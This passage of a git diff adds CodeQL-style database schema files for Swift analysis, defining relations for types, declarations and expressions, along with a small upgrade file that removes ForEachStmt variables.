+); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: 
@unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + 
+enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + 
+@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +;
diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties
new file mode 100644
index 00000000000..cd7dbeeea00
--- /dev/null
+++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties
@@ -0,0 +1,4 @@
+description: Remove variables from `ForEachStmt`
+compatibility: partial
+
+for_each_stmt_variables.rel: delete
diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme
new file mode 100644
index 00000000000..44c4818a898
--- /dev/null
+++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme
@@ -0,0 +1,2786 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: 
@availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: 
@unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: 
@protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + 
+@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + 
+initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: 
@var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] 
+param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref 
+); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] 
+decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr 
+| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| 
@regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + 
+property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( 